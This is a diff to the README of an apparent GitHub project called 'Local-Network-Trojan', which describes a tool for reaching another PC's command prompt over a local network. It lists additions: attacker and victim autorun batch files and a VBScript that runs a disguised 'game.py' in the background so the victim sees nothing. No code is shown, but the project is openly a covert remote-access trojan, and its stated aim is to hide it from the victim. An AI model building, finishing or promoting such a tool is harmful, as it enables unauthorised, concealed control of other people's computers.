DennisMihaltan/Local-Network-Trojan-NEW-version-/README.md

 # Local-Network-Trojan-NEW-version-
-This is a project in which we can access a PC/Laptop's CMD.
+This is a project in which we can access a PC/Laptop's CMD

 I IMPROVE THIS PROJECT FROM: https://github.com/Ashii198/Local_Network_Trojan

 I add:

+- COMPLETED INSTRUCTIONS
 - "Attacker's autorun.bat"
 - "Victim's autorun.bat"
 - "script.vbs" (for execute "game.py" in background, and the Victim will not use the game, all is hide from the Victim's screen)